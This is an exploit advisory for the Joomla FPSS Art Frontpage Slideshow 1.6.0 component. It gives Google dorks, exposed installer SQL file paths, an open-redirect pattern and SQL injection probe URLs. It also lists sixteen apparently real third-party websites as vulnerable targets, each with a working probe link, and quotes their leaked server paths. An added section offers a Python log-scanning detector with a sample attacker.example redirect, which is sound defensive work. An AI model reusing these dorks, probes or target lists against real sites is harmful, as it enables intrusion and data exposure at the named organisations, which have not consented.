Joomla FPSS Art Frontpage Slideshow 1.6.0 Database Disclose / SQL Injection

Joomla FPSS Art Frontpage Slideshow component version 1.6.0 suffers from database disclosure, open redirection, and remote SQL injection vulnerabilities.


MD5 | c7925f2e6adc722858e2041ca26bb11e

####################################################################################################

# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
#                inurl:"/administrator/components/com_fpss/"
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 [ Relative Path Traversal ]
#                      CWE-200 [ Information Exposure ]
#                      CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#                      CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################################################

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

####################################################################################################

# Description :
*************

Art Frontpage Slideshow is a Joomla slideshow extension that adds front-end animation
to a site and lets the operator present images of featured products and news
in an eye-catching way.

####################################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql

These are the component's installer SQL files. When the web server serves them
to anonymous clients they disclose the table definitions and any seeded rows of
the com_fpss tables, not the contents of the live database. A 403 or 404 on
these paths means the files are not reachable and this part of the advisory
does not apply.

# Open Redirection Exploit :
*************************

/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]

The url parameter is used as the redirect destination without being restricted
to the site's own host, so a link to the vulnerable site can send a visitor on
to an attacker-chosen address.

# SQL Injection Exploit :
***********************

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=atom&lang=[SQL Injection]

/index.php?option=com_fpss&view=article&id=[ID-NUMBER]:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]

The injection points are the type, lang and Itemid parameters respectively;
the example requests further down append a single quote (%27) to each of them
as the probe.
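For defenders, the three request patterns above translate directly into log detection rules. The following script is an added example written for this page, not code from the advisory or from the component vendor: it parses Apache combined-format access-log lines and flags served com_fpss .sql files, off-site task=track redirects, and metacharacters in the type, lang and Itemid parameters. The log lines, client addresses and the local host name www.example.org are constructed for illustration.

```python
"""Detection logic for the three com_fpss issues described above, run over
constructed Apache combined-format access-log lines.  Added example; the log
entries, IP addresses and the local host name are invented."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" format: ip ident user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directory under which the advisory shows the installer .sql files being served.
FPSS_ADMIN_DIR = "/administrator/components/com_fpss/"

# Expected shape of the parameters the advisory names as injection points:
# type/lang are short format or language tokens, Itemid is a Joomla menu item id.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_-]+$")
SAFE_INT = re.compile(r"^[0-9]+$")


def classify(target, status, local_hosts):
    """Return the list of finding names for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}

    # 1. Database disclosure: a .sql file under the component's admin directory
    #    was actually served (2xx). A 403/404 means the server already blocks it.
    if FPSS_ADMIN_DIR in path and path.lower().endswith(".sql") and 200 <= status < 300:
        findings.append("sql_file_exposure")

    if q.get("option") != "com_fpss":
        return findings

    # 2. Open redirect: task=track with an absolute url= pointing at a host that is not ours.
    if q.get("task") == "track" and "url" in q:
        dest = urlsplit(q["url"])
        if dest.scheme in ("http", "https") and dest.hostname not in local_hosts:
            findings.append("open_redirect")

    # 3. SQL injection probes: anything outside the expected alphabet in the named parameters.
    for name, pattern in (("type", SAFE_TOKEN), ("lang", SAFE_TOKEN), ("Itemid", SAFE_INT)):
        if name in q and not pattern.match(q[name]):
            findings.append("sqli_probe:" + name)
    return findings


def scan_log(lines, local_hosts=("www.example.org",)):
    """Return (client_ip, finding, target) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for finding in classify(m["target"], int(m["status"]), set(local_hosts)):
            hits.append((m["ip"], finding, m["target"]))
    return hits


# Constructed sample log (not from any real server). Only the first four lines are attacks;
# the last three are benign traffic that must not be flagged.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Jan/2019:10:00:01 +0000] "GET /administrator/components/com_fpss/install.mysql.sql HTTP/1.1" 200 4310 "-" "curl/7.58.0"',
    '198.51.100.7 - - [19/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27 HTTP/1.1" 500 812 "-" "curl/7.58.0"',
    '198.51.100.7 - - [19/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27 HTTP/1.1" 200 9120 "-" "curl/7.58.0"',
    '198.51.100.7 - - [19/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_fpss&task=track&id=5&url=http%3A%2F%2Fattacker.example%2F HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=en-GB HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Jan/2019:10:00:06 +0000] "GET /administrator/components/com_fpss/install.mysql.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Jan/2019:10:00:07 +0000] "GET /index.php?option=com_fpss&task=track&id=5&url=https%3A%2F%2Fwww.example.org%2Fproducts HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding, target in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{finding}\t{target}")
```

The .sql rule keys on the response status on purpose: after the files are denied at the web server, the same requests return 403 and stop being findings, so the rule doubles as a check that the mitigation is in place. The parameter rules are deliberately strict allow-lists rather than quote detection, since a probe need not contain a quote at all.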

####################################################################################################

# Example Vulnerable Sites :
*************************

[+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27

[+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27

[+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27

[+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql

[+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql

[+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql

[+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql

[+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql

[+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql

[+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql

[+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql

[+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql

[+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql

[+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql

[+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql

[+] marinelog.com/administrator/components/com_fpss/install.mysql.sql

####################################################################################################

# Example SQL Database Error :
***************************

Note that the output below is not a MySQL error message but PHP warnings and
strict-standards notices that the sites print because error display is enabled.
They confirm that the targets leak absolute filesystem paths (information
exposure); they do not by themselves prove that the injected quote reached a
query, so an injection still has to be verified with a boolean or time-based
test.

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1) in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423

Strict Standards: Non-static method JLoader::import() should not be called statically in /home/uadvirtual/public_html/main/libraries/joomla/import.php on line 29

####################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################################################
